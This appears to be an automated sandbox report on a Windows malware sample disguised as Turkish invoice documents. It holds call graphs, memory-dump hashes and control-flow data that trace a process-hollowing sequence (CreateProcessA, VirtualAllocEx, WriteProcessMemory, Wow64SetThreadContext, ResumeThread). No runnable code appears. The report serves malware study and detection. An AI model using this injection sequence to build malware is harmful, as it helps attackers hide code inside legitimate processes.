Wow64SetThreadContext 42487->42497 42488 6ccfb5d 42489->42487 42490 6ccf3d9 42489->42490 42491 6ccf9b7 42489->42491 42492 6ccda98 ResumeThread 42489->42492 42493 6ccda91 ResumeThread 42489->42493 42490->42408 42494 6ccddc8 ReadProcessMemory 42491->42494 42495 6ccddd0 ReadProcessMemory 42491->42495 42492->42489 42493->42489 42494->42490 42495->42490 42496->42488 42497->42488 42499 6ccf328 42498->42499 42501 6ccdcd8 WriteProcessMemory 42499->42501 42502 6ccdce0 WriteProcessMemory 42499->42502 42500 6ccfa9a 42501->42500 42502->42500 42504 6ccdad8 ResumeThread 42503->42504 42506 6ccdb09 42504->42506 42506->42433 42508 6ccdad8 ResumeThread 42507->42508 42510 6ccdb09 42508->42510 42510->42433 42512 6ccde1b ReadProcessMemory 42511->42512 42514 6ccde5f 42512->42514 42514->42431 42516 6ccde1b ReadProcessMemory 42515->42516 42518 6ccde5f 42516->42518 42518->42431 42520 6ccdb8d Wow64SetThreadContext 42519->42520 42522 6ccdbd5 42520->42522 42522->42435 42524 6ccdb8d Wow64SetThreadContext 42523->42524 42526 6ccdbd5 42524->42526 42526->42435 42528 6ccdc60 VirtualAllocEx 42527->42528 42530 6ccdc9d 42528->42530 42530->42444 42532 6ccdc60 VirtualAllocEx 42531->42532 42534 6ccdc9d 42532->42534 42534->42444 42536 6ccdd28 WriteProcessMemory 42535->42536 42538 6ccdd7f 42536->42538 42538->42448 42540 6ccdd28 WriteProcessMemory 42539->42540 42542 6ccdd7f 42540->42542 42542->42448 42544 6ccdf66 CreateProcessA 42543->42544 42546 6cce1b3 42544->42546 42548 6ccdff1 CreateProcessA 42547->42548 42550 6cce1b3 42548->42550 42349 4b21bd8 42350 4b21bf6 42349->42350 42351 4b21c00 42349->42351 42354 4b21c40 42350->42354 42359 4b21c2b 42350->42359 42355 4b21c4e 42354->42355 42358 4b21c6d 42354->42358 42364 4b21094 42355->42364 42358->42351 42360 4b21c6d 42359->42360 42361 4b21c3e 42359->42361 42360->42351 42361->42360 42362 4b21094 FindCloseChangeNotification 42361->42362 42363 4b21c69 42362->42363 42363->42351 42365 4b21db8 FindCloseChangeNotification 42364->42365 42366 4b21c69 42365->42366 42366->42351 41972 5037018 41973 5037045 41972->41973 41986 5035a2c 41973->41986 41975 50370e1 41976 5035a2c 2 API calls 41975->41976 41977 5037113 41976->41977 42009 5035a3c 41977->42009 41980 5035a3c 2 API calls 41981 5037177 41980->41981 42013 5036b34 41981->42013 41983 50371a9 41984 5036b34 2 API calls 41983->41984 41985 50371db 41984->41985 41987 5035a37 41986->41987 41988 503804b 41987->41988 42038 28a8349 41987->42038 42046 28a8355 41987->42046 42054 28a8335 41987->42054 42062 28a8351 41987->42062 42070 28a8331 41987->42070 42078 28a835d 41987->42078 42086 28a833d 41987->42086 42094 28a5c9c 41987->42094 42102 28a83bf 41987->42102 42110 28a8359 41987->42110 42118 28a8339 41987->42118 42126 28a8365 41987->42126 42134 28a8345 41987->42134 42142 28a8361 41987->42142 42150 28a8341 41987->42150 42158 28a836d 41987->42158 42166 28a834d 41987->42166 42174 28a832d 41987->42174 42182 28a83cc 41987->42182 42190 28a8369 41987->42190 41988->41975 42010 5035a47 42009->42010 42264 5036c94 42010->42264 42012 5037145 42012->41980 42014 5036b3f 42013->42014 42287 5036e34 42014->42287 42016 50391cb 42016->41983 42017 5039202 42016->42017 42018 28a8349 2 API calls 42016->42018 42019 28a8369 2 API calls 42016->42019 42020 28a83cc 2 API calls 42016->42020 42021 28a832d 2 API calls 42016->42021 42022 28a834d 2 API calls 42016->42022 42023 28a836d 2 API calls 42016->42023 42024 28a8341 2 API calls 42016->42024 42025 28a8361 2 API calls 42016->42025 42026 28a8345 2 API calls 42016->42026 42027 28a8365 2 API calls 42016->42027 42028 28a8339 2 API calls 42016->42028 42029 28a8359 2 API calls 42016->42029 42030 28a83bf 2 API calls 42016->42030 42031 28a5c9c 2 API calls 42016->42031 42032 28a833d 2 API calls 42016->42032 42033 28a835d 2 API calls 42016->42033 42034 28a8331 2 API calls 42016->42034 42035 28a8351 2 API calls 42016->42035 42036 28a8335 2 API calls 42016->42036 42037 28a8355 2 API calls 42016->42037 42017->41983 42018->42017 42019->42017 42020->42017 42021->42017 42022->42017 42023->42017 42024->42017 42025->42017 42026->42017 42027->42017 42028->42017 42029->42017 42030->42017 42031->42017 42032->42017 42033->42017 42034->42017 42035->42017 42036->42017 42037->42017 42039 28a8369 42038->42039 42040 28a86b3 42039->42040 42198 28aaa58 42039->42198 42202 28aaa68 42039->42202 42206 28aad60 42039->42206 42041 28a86f1 42040->42041 42210 28ace50 42040->42210 42041->41988 42047 28a8369 42046->42047 42048 28a86b3 42047->42048 42050 28aaa58 2 API calls 42047->42050 42051 28aaa68 2 API calls 42047->42051 42052 28aad60 2 API calls 42047->42052 42049 28a86f1 42048->42049 42053 28ace50 2 API calls 42048->42053 42049->41988 42050->42048 42051->42048 42052->42048 42053->42049 42055 28a8369 42054->42055 42057 28a86b3 42055->42057 42058 28aaa58 2 API calls 42055->42058 42059 28aaa68 2 API calls 42055->42059 42060 28aad60 2 API calls 42055->42060 42056 28a86f1 42056->41988 42057->42056 42061 28ace50 2 API calls 42057->42061 42058->42057 42059->42057 42060->42057 42061->42056 42063 28a8369 42062->42063 42065 28a86b3 42063->42065 42066 28aaa58 2 API calls 42063->42066 42067 28aaa68 2 API calls 42063->42067 42068 28aad60 2 API calls 42063->42068 42064 28a86f1 42064->41988 42065->42064 42069 28ace50 2 API calls 42065->42069 42066->42065 42067->42065 42068->42065 42069->42064 42071 28a8369 42070->42071 42073 28a86b3 42071->42073 42074 28aaa58 2 API calls 42071->42074 42075 28aaa68 2 API calls 42071->42075 42076 28aad60 2 API calls 42071->42076 42072 28a86f1 42072->41988 42073->42072 42077 28ace50 2 API calls 42073->42077 42074->42073 42075->42073 42076->42073 42077->42072 42079 28a8369 42078->42079 42081 28a86b3 42079->42081 42082 28aaa58 2 API calls 42079->42082 42083 28aaa68 2 API calls 42079->42083 42084 28aad60 2 API calls 42079->42084 42080 28a86f1 42080->41988 42081->42080 42085 28ace50 2 API calls 42081->42085 42082->42081 42083->42081 42084->42081 42085->42080 42087 28a8369 42086->42087 42089 28a86b3 42087->42089 42090 28aaa58 2 API calls 42087->42090 42091 28aaa68 2 API calls 42087->42091 42092 28aad60 2 API calls 42087->42092 42088 28a86f1 42088->41988 42089->42088 42093 28ace50 2 API calls 42089->42093 42090->42089 42091->42089 42092->42089 42093->42088 42095 28a5ca7 42094->42095 42096 28a86b3 42095->42096 42098 28aaa58 2 API calls 42095->42098 42099 28aaa68 2 API calls 42095->42099 42100 28aad60 2 API calls 42095->42100 42097 28a86f1 42096->42097 42101 28ace50 2 API calls 42096->42101 42097->41988 42098->42096 42099->42096 42100->42096 42101->42097 42103 28a8369 42102->42103 42103->42102 42105 28a86b3 42103->42105 42106 28aaa58 2 API calls 42103->42106 42107 28aaa68 2 API calls 42103->42107 42108 28aad60 2 API calls 42103->42108 42104 28a86f1 42104->41988 42105->42104 42109 28ace50 2 API calls 42105->42109 42106->42105 42107->42105 42108->42105 42109->42104 42111 28a8369 42110->42111 42113 28a86b3 42111->42113 42114 28aaa58 2 API calls 42111->42114 42115 28aaa68 2 API calls 42111->42115 42116 28aad60 2 API calls 42111->42116 42112 28a86f1 42112->41988 42113->42112 42117 28ace50 2 API calls 42113->42117 42114->42113 42115->42113 42116->42113 42117->42112 42119 28a8369 42118->42119 42121 28a86b3 42119->42121 42123 28aaa58 2 API calls 42119->42123 42124 28aaa68 2 API calls 42119->42124 42125 28aad60 2 API calls 42119->42125 42120 28a86f1 42120->41988 42121->42120 42122 28ace50 2 API calls 42121->42122 42122->42120 42123->42121 42124->42121 42125->42121 42127 28a8369 42126->42127 42129 28a86b3 42127->42129 42130 28aaa58 2 API calls 42127->42130 42131 28aaa68 2 API calls 42127->42131 42132 28aad60 2 API calls 42127->42132 42128 28a86f1 42128->41988 42129->42128 42133 28ace50 2 API calls 42129->42133 42130->42129 42131->42129 42132->42129 42133->42128 42135 28a8369 42134->42135 42137 28a86b3 42135->42137 42138 28aaa58 2 API calls 42135->42138 42139 28aaa68 2 API calls 42135->42139 42140 28aad60 2 API calls 42135->42140 42136 28a86f1 42136->41988 42137->42136 42141 28ace50 2 API calls 42137->42141 42138->42137 42139->42137 42140->42137 42141->42136 42143 28a8369 42142->42143 42145 28a86b3 42143->42145 42146 28aaa58 2 API calls 42143->42146 42147 28aaa68 2 API calls 42143->42147 42148 28aad60 2 API calls 42143->42148 42144 28a86f1 42144->41988 42145->42144 42149 28ace50 2 API calls 42145->42149 42146->42145 42147->42145 42148->42145 42149->42144 42151 28a8369 42150->42151 42153 28a86b3 42151->42153 42154 28aaa58 2 API calls 42151->42154 42155 28aaa68 2 API calls 42151->42155 42156 28aad60 2 API calls 42151->42156 42152 28a86f1 42152->41988 42153->42152 42157 28ace50 2 API calls 42153->42157 42154->42153 42155->42153 42156->42153 42157->42152 42159 28a8369 42158->42159 42161 28a86b3 42159->42161 42162 28aaa58 2 API calls 42159->42162 42163 28aaa68 2 API calls 42159->42163 42164 28aad60 2 API calls 42159->42164 42160 28a86f1 42160->41988 42161->42160 42165 28ace50 2 API calls 42161->42165 42162->42161 42163->42161 42164->42161 42165->42160 42167 28a8369 42166->42167 42169 28a86b3 42167->42169 42170 28aaa58 2 API calls 42167->42170 42171 28aaa68 2 API calls 42167->42171 42172 28aad60 2 API calls 42167->42172 42168 28a86f1 42168->41988 42169->42168 42173 28ace50 2 API calls 42169->42173 42170->42169 42171->42169 42172->42169 42173->42168 42175 28a8369 42174->42175 42177 28a86b3 42175->42177 42178 28aaa58 2 API calls 42175->42178 42179 28aaa68 2 API calls 42175->42179 42180 28aad60 2 API calls 42175->42180 42176 28a86f1 42176->41988 42177->42176 42181 28ace50 2 API calls 42177->42181 42178->42177 42179->42177 42180->42177 42181->42176 42183 28a83d1 42182->42183 42184 28a86b3 42183->42184 42186 28aaa58 2 API calls 42183->42186 42187 28aaa68 2 API calls 42183->42187 42188 28aad60 2 API calls 42183->42188 42185 28a86f1 42184->42185 42189 28ace50 2 API calls 42184->42189 42185->41988 42186->42184 42187->42184 42188->42184 42189->42185 42191 28a8371 42190->42191 42191->42190 42193 28a86b3 42191->42193 42195 28aaa58 2 API calls 42191->42195 42196 28aaa68 2 API calls 42191->42196 42197 28aad60 2 API calls 42191->42197 42192 28a86f1 42192->41988 42193->42192 42194 28ace50 2 API calls 42193->42194 42194->42192 42195->42193 42196->42193 42197->42193 42199 28aaa83 42198->42199 42200 28a83cc 2 API calls 42199->42200 42201 28aaa9b 42199->42201 42200->42201 42201->42040 42203 28aaa83 42202->42203 42204 28a83cc 2 API calls 42203->42204 42205 28aaa9b 42203->42205 42204->42205 42205->42040 42214 28aad88 42206->42214 42218 28aad98 42206->42218 42207 28aad76 42207->42040 42211 28ace71 42210->42211 42212 28ace95 42211->42212 42241 28ad000 42211->42241 42212->42041 42215 28aad98 42214->42215 42221 28aae90 42215->42221 42216 28aada7 42216->42207 42220 28aae90 2 API calls 42218->42220 42219 28aada7 42219->42207 42220->42219 42222 28aaea1 42221->42222 42223 28aaec4 42221->42223 42222->42223 42229 28ab118 42222->42229 42233 28ab128 42222->42233 42223->42216 42224 28aaebc 42224->42223 42225 28ab0c8 GetModuleHandleW 42224->42225 42226 28ab0f5 42225->42226 42226->42216 42230 28ab13c 42229->42230 42231 28ab161 42230->42231 42237 28aa8d0 42230->42237 42231->42224 42234 28ab13c 42233->42234 42235 28aa8d0 LoadLibraryExW 42234->42235 42236 28ab161 42234->42236 42235->42236 42236->42224 42238 28ab308 LoadLibraryExW 42237->42238 42240 28ab381 42238->42240 42240->42231 42243 28ad00d 42241->42243 42242 28ad047 42242->42212 42243->42242 42245 28ac938 42243->42245 42246 28ac943 42245->42246 42248 28ad958 42246->42248 42249 28aca64 42246->42249 42248->42248 42250 28aca6f 42249->42250 42251 28a5c9c 2 API calls 42250->42251 42252 28ad9c7 42251->42252 42255 28aca74 42252->42255 42254 28ad9f0 42254->42248 42257 28aca7f 42255->42257 42259 28aef69 42257->42259 42260 28adcb4 42257->42260 42258 28aef64 42258->42254 42259->42254 42261 28adcbf 42260->42261 42262 28a83cc 2 API calls 42261->42262 42263 28af025 42261->42263 42262->42263 42263->42258 42265 5036c9f 42264->42265 42267 28a8349 2 API calls 42265->42267 42268 28a8369 2 API calls 42265->42268 42269 28a83cc 2 API calls 42265->42269 42270 28a832d 2 API calls 42265->42270 42271 28a834d 2 API calls 42265->42271 42272 28a836d 2 API calls 42265->42272 42273 28a8341 2 API calls 42265->42273 42274 28a8361 2 API calls 42265->42274 42275 28a8345 2 API calls 42265->42275 42276 28a8365 2 API calls 42265->42276 42277 28a8339 2 API calls 42265->42277 42278 28a8359 2 API calls 42265->42278 42279 28a83bf 2 API calls 42265->42279 42280 28a5c9c 2 API calls 42265->42280 42281 28a833d 2 API calls 42265->42281 42282 28a835d 2 API calls 42265->42282 42283 28a8331 2 API calls 42265->42283 42284 28a8351 2 API calls 42265->42284 42285 28a8335 2 API calls 42265->42285 42286 28a8355 2 API calls 42265->42286 42266 5038f54 42266->42012 42267->42266 42268->42266 42269->42266 42270->42266 42271->42266 42272->42266 42273->42266 42274->42266 42275->42266 42276->42266 42277->42266 42278->42266 42279->42266 42280->42266 42281->42266 42282->42266 42283->42266 42284->42266 42285->42266 42286->42266 42288 5036e3f 42287->42288 42289 5039202 42288->42289 42290 28a8349 2 API calls 42288->42290 42291 28a8369 2 API calls 42288->42291 42292 28a83cc 2 API calls 42288->42292 42293 28a832d 2 API calls 42288->42293 42294 28a834d 2 API calls 42288->42294 42295 28a836d 2 API calls 42288->42295 42296 28a8341 2 API calls 42288->42296 42297 28a8361 2 API calls 42288->42297 42298 28a8345 2 API calls 42288->42298 42299 28a8365 2 API calls 42288->42299 42300 28a8339 2 API calls 42288->42300 42301 28a8359 2 API calls 42288->42301 42302 28a83bf 2 API calls 42288->42302 42303 28a5c9c 2 API calls 42288->42303 42304 28a833d 2 API calls 42288->42304 42305 28a835d 2 API calls 42288->42305 42306 28a8331 2 API calls 42288->42306 42307 28a8351 2 API calls 42288->42307 42308 28a8335 2 API calls 42288->42308 42309 28a8355 2 API calls 42288->42309 42289->42016 42290->42289 42291->42289 42292->42289 42293->42289 42294->42289 42295->42289 42296->42289 42297->42289 42298->42289 42299->42289 42300->42289 42301->42289 42302->42289 42303->42289 42304->42289 42305->42289 42306->42289 42307->42289 42308->42289 42309->42289
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .
                                                              • API String ID: 0-248832578
                                                              • Opcode ID: de035460c25e2ff71446d0303b60ef3012ba344f6ee527663b877dd2627b5d76
                                                              • Instruction ID: 305052f0fefbf5776384e64cd44499d5b57d58bab0f7c480db544eeba7f910fa
                                                              • Opcode Fuzzy Hash: de035460c25e2ff71446d0303b60ef3012ba344f6ee527663b877dd2627b5d76
                                                              • Instruction Fuzzy Hash: 91410975E06508CFDB48DFAAD5546EEFBF2EF88310F24C06AD409A7255DB349942CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990503958.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5030000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 555445e9b2b6528f7d58aede9ceda4bbc46ecf0ccd4b71afdc2c9a1bd71d11d4
                                                              • Instruction ID: 0b1f0b8de3e1eb061d760479161dbae0a9cfd46c34af7f7b3fc96fe5ab068774
                                                              • Opcode Fuzzy Hash: 555445e9b2b6528f7d58aede9ceda4bbc46ecf0ccd4b71afdc2c9a1bd71d11d4
                                                              • Instruction Fuzzy Hash: A0A2BF34A40219CFDB24DF68C995AEDB7B2BF89300F1181E9D409AB765DB31AE85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990503958.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5030000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8463c9449987c733fa3298cb31fe8e78e9e2ede3541bdf874f628035767f6eeb
                                                              • Instruction ID: 483664931947e3a91fc345d763c5a6a9d146f21a837a3d146aec4465dfcae9d6
                                                              • Opcode Fuzzy Hash: 8463c9449987c733fa3298cb31fe8e78e9e2ede3541bdf874f628035767f6eeb
                                                              • Instruction Fuzzy Hash: 8F82C234A40219CFDB24DF64C995BE9B7B2EF89300F1181E9D409AB765EB31AE85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990303500.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b20000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86b36bba2b639c156309779a8740f7390b7a5f185fac42181c726c436755f4e8
                                                              • Instruction ID: b25382188663ed40ed53e1ffd0da27af804219d7371c44980008ffe40d1b79c4
                                                              • Opcode Fuzzy Hash: 86b36bba2b639c156309779a8740f7390b7a5f185fac42181c726c436755f4e8
                                                              • Instruction Fuzzy Hash: AE327B34B012149FEB19DB69D660BAEB7F6EF89304F1444A9E50ADB7A0CB34ED01CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7125c5636b349c5337b4224520e8e442d746ddad5be24f8a566b615bba35bf41
                                                              • Instruction ID: 5523800c536698e32e5a04cc7dc1df0d938dfe80cefe4c930018557a4b34e0e9
                                                              • Opcode Fuzzy Hash: 7125c5636b349c5337b4224520e8e442d746ddad5be24f8a566b615bba35bf41
                                                              • Instruction Fuzzy Hash: 0451E874E055198FCB48DF9AD5909AEFBF2FF88310F24C069D418A7255DB30A942CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 427 6ccdf5c-6ccdf64 428 6ccdf8a-6ccdffd 427->428 429 6ccdf66-6ccdf89 427->429 431 6ccdfff-6cce009 428->431 432 6cce036-6cce056 428->432 429->428 431->432 433 6cce00b-6cce00d 431->433 437 6cce08f-6cce0be 432->437 438 6cce058-6cce062 432->438 434 6cce00f-6cce019 433->434 435 6cce030-6cce033 433->435 439 6cce01d-6cce02c 434->439 440 6cce01b 434->440 435->432 448 6cce0f7-6cce1b1 CreateProcessA 437->448 449 6cce0c0-6cce0ca 437->449 438->437 441 6cce064-6cce066 438->441 439->439 442 6cce02e 439->442 440->439 443 6cce068-6cce072 441->443 444 6cce089-6cce08c 441->444 442->435 446 6cce074 443->446 447 6cce076-6cce085 443->447 444->437 446->447 447->447 450 6cce087 447->450 460 6cce1ba-6cce240 448->460 461 6cce1b3-6cce1b9 448->461 449->448 451 6cce0cc-6cce0ce 449->451 450->444 453 6cce0d0-6cce0da 451->453 454 6cce0f1-6cce0f4 451->454 455 6cce0dc 453->455 456 6cce0de-6cce0ed 453->456 454->448 455->456 456->456 458 6cce0ef 456->458 458->454 471 6cce250-6cce254 460->471 472 6cce242-6cce246 460->472 461->460 474 6cce264-6cce268 471->474 475 6cce256-6cce25a 471->475 472->471 473 6cce248 472->473 473->471 477 6cce278-6cce27c 474->477 478 6cce26a-6cce26e 474->478 475->474 476 6cce25c 475->476 476->474 480 6cce28e-6cce295 477->480 481 6cce27e-6cce284 477->481 478->477 479 6cce270 478->479 479->477 482 6cce2ac 480->482 483 6cce297-6cce2a6 480->483 481->480 485 6cce2ad 482->485 483->482 485->485
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CCE19E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 0759d1cd3711b782ac0a657865d7984f9742d539708a8990bf1eda33d80d6dd1
                                                              • Instruction ID: 1dc2942026f2a90b7ec723915d34ca7661b93ee366666188b21e6a2f2d9592e8
                                                              • Opcode Fuzzy Hash: 0759d1cd3711b782ac0a657865d7984f9742d539708a8990bf1eda33d80d6dd1
                                                              • Instruction Fuzzy Hash: D6A17D71D00259CFEB64CFA8C8507EDBBB2BF49324F14856DD809A7240DB759A85CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 486 6ccdf68-6ccdffd 488 6ccdfff-6cce009 486->488 489 6cce036-6cce056 486->489 488->489 490 6cce00b-6cce00d 488->490 494 6cce08f-6cce0be 489->494 495 6cce058-6cce062 489->495 491 6cce00f-6cce019 490->491 492 6cce030-6cce033 490->492 496 6cce01d-6cce02c 491->496 497 6cce01b 491->497 492->489 505 6cce0f7-6cce1b1 CreateProcessA 494->505 506 6cce0c0-6cce0ca 494->506 495->494 498 6cce064-6cce066 495->498 496->496 499 6cce02e 496->499 497->496 500 6cce068-6cce072 498->500 501 6cce089-6cce08c 498->501 499->492 503 6cce074 500->503 504 6cce076-6cce085 500->504 501->494 503->504 504->504 507 6cce087 504->507 517 6cce1ba-6cce240 505->517 518 6cce1b3-6cce1b9 505->518 506->505 508 6cce0cc-6cce0ce 506->508 507->501 510 6cce0d0-6cce0da 508->510 511 6cce0f1-6cce0f4 508->511 512 6cce0dc 510->512 513 6cce0de-6cce0ed 510->513 511->505 512->513 513->513 515 6cce0ef 513->515 515->511 528 6cce250-6cce254 517->528 529 6cce242-6cce246 517->529 518->517 531 6cce264-6cce268 528->531 532 6cce256-6cce25a 528->532 529->528 530 6cce248 529->530 530->528 534 6cce278-6cce27c 531->534 535 6cce26a-6cce26e 531->535 532->531 533 6cce25c 532->533 533->531 537 6cce28e-6cce295 534->537 538 6cce27e-6cce284 534->538 535->534 536 6cce270 535->536 536->534 539 6cce2ac 537->539 540 6cce297-6cce2a6 537->540 538->537 542 6cce2ad 539->542 540->539 542->542
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CCE19E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 563d04716b912d3f9386d51d8dc14f189984d588f65ba44a864bb904fa94bdc5
                                                              • Instruction ID: d98e89aba7241f632cdf599bf4b8253c168a2841f2ced12a80d3ceff1e8d8727
                                                              • Opcode Fuzzy Hash: 563d04716b912d3f9386d51d8dc14f189984d588f65ba44a864bb904fa94bdc5
                                                              • Instruction Fuzzy Hash: BD917C71D00259CFEB64CFA8C851BEDBBB2BF49310F04856ED809A7240DB759A85CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 543 28aae90-28aae9f 544 28aaecb-28aaecf 543->544 545 28aaea1-28aaeae call 28a9898 543->545 547 28aaee3-28aaf24 544->547 548 28aaed1-28aaedb 544->548 550 28aaeb0 545->550 551 28aaec4 545->551 554 28aaf31-28aaf3f 547->554 555 28aaf26-28aaf2e 547->555 548->547 598 28aaeb6 call 28ab118 550->598 599 28aaeb6 call 28ab128 550->599 551->544 556 28aaf63-28aaf65 554->556 557 28aaf41-28aaf46 554->557 555->554 562 28aaf68-28aaf6f 556->562 559 28aaf48-28aaf4f call 28aa874 557->559 560 28aaf51 557->560 558 28aaebc-28aaebe 558->551 561 28ab000-28ab0c0 558->561 564 28aaf53-28aaf61 559->564 560->564 593 28ab0c8-28ab0f3 GetModuleHandleW 561->593 594 28ab0c2-28ab0c5 561->594 565 28aaf7c-28aaf83 562->565 566 28aaf71-28aaf79 562->566 564->562 568 28aaf90-28aaf92 call 28aa884 565->568 569 28aaf85-28aaf8d 565->569 566->565 573 28aaf97-28aaf99 568->573 569->568 574 28aaf9b-28aafa3 573->574 575 28aafa6-28aafab 573->575 574->575 576 28aafc9-28aafd6 575->576 577 28aafad-28aafb4 575->577 584 28aafd8-28aaff6 576->584 585 28aaff9-28aafff 576->585 577->576 579 28aafb6-28aafc6 call 28aa894 call 28aa8a4 577->579 579->576 584->585 595 28ab0fc-28ab110 593->595 596 28ab0f5-28ab0fb 593->596 594->593 596->595 598->558 599->558
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 028AB0E6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 0586e6af699283abfc4498e6fb52df421de20505eb86810a87491445f27b37aa
                                                              • Instruction ID: d6c2880508aa69a75d71c562738c03660a3404fb2814c5a3f4c83f0eb1a5cfc7
                                                              • Opcode Fuzzy Hash: 0586e6af699283abfc4498e6fb52df421de20505eb86810a87491445f27b37aa
                                                              • Instruction Fuzzy Hash: 91714978A00B058FEB28DF29D45475ABBF5FF48704F00892DD48AD7A50DB75E84ACB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 600 5030bfc-50342fc 603 5034302-5034307 600->603 604 50343ac-50343cc call 5030ad4 600->604 605 503435a-5034392 CallWindowProcW 603->605 606 5034309-5034340 603->606 612 50343cf-50343dc 604->612 608 5034394-503439a 605->608 609 503439b-50343aa 605->609 614 5034342-5034348 606->614 615 5034349-5034358 606->615 608->609 609->612 614->615 615->612
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05034381
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990503958.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5030000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: d0aafca92ecd7601f47ad84f7e367f430cc62c2a8912ff1fe53b78f105ed494e
                                                              • Instruction ID: 346f2b8398d4068eee0fc1324b5faa9867dcbd6164fe4a804f1bd0361fd1603b
                                                              • Opcode Fuzzy Hash: d0aafca92ecd7601f47ad84f7e367f430cc62c2a8912ff1fe53b78f105ed494e
                                                              • Instruction Fuzzy Hash: 3B4129B49003099FDB14CF99D489AAEFBF9FF89314F248459D519AB321C374A845CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 617 28a449c-28a59d9 CreateActCtxA 620 28a59db-28a59e1 617->620 621 28a59e2-28a5a3c 617->621 620->621 628 28a5a4b-28a5a4f 621->628 629 28a5a3e-28a5a41 621->629 630 28a5a60-28a5a90 628->630 631 28a5a51-28a5a5d 628->631 629->628 635 28a5a42-28a5a47 630->635 636 28a5a92-28a5b14 630->636 631->630 635->628
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 028A59C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 27c1e9d0f961adfc1c3cd08ec27de7dfd4ba63c91ba72427dcfbd957e740126a
                                                              • Instruction ID: 8797516aaf36c98187b85f3c0deb16142895013c198d03647d14f93247c2efad
